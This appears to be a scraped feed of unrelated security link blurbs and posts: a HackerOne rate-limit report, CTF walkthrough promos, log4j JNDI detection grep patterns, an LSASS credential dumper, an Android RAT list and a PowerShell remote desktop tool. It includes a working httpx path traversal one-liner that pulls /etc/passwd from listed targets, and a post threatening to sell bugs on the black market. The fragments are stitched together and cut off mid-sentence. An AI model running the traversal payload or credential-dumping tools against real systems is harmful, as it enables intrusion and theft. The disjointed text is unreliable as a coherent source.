## Summary:
`customerAccessTokenCreate` mutation in the Storefront API does not correctly throttle login attempts. An issue in similar report https://hackerone.com/reports/708013 was already fixed,...

Video walk-through for the Web Challenge called "Naughty or Nice" from Day 5 of the HTB "Cyber Santa is Coming to Town" Capture The Flag event that was going on from December 1st to December 5th 2021.
#hackthebox #CTF #SANTA #santa #cyber #web #challenges…

sudo grep -r '${jndi:ldap://' /var/log sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log #log4j #log_4jrce #RCE #apache

Restricts access to LDAP via JNDI.

[Bad news] Ransomware has landed on #log4j2 RCE

Background JFrog security research team (formerly Vdoo) has recently disclosed a code injection issue in one of the utilities shipped with TensorFlow, a popular Machine Learning platform that’s widely used in the industry. The issue has been assigned to CVE…

A Combination LSASS Dumper and LSASS Parser. All Credit goes to @slyd0g and @cube0x0. - icyguider/DumpNParse

This is the second episode of the Steganography challenges video series.In this video I would like to showcase another challenge from SNYK capture the flag e...

Android - Remote Access Trojan List. Contribute to wishihab/Android-RATList development by creating an account on GitHub.

Microsoft fixes the vulnerability. did not give an Bounty Anything that is discovered next time, i will sell to ZDI/Black Market @msftsecresponse @msftsecurity

Part 3 of a series covering fuzzer development using LibAFL

Nginx Path Traversal httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:' #bugbountytips #BugBounty #0day #nuclei

Remote Desktop entirely coded in PowerShell. Contribute to PhrozenIO/PowerRemoteDesktop development by creating an account on GitHub.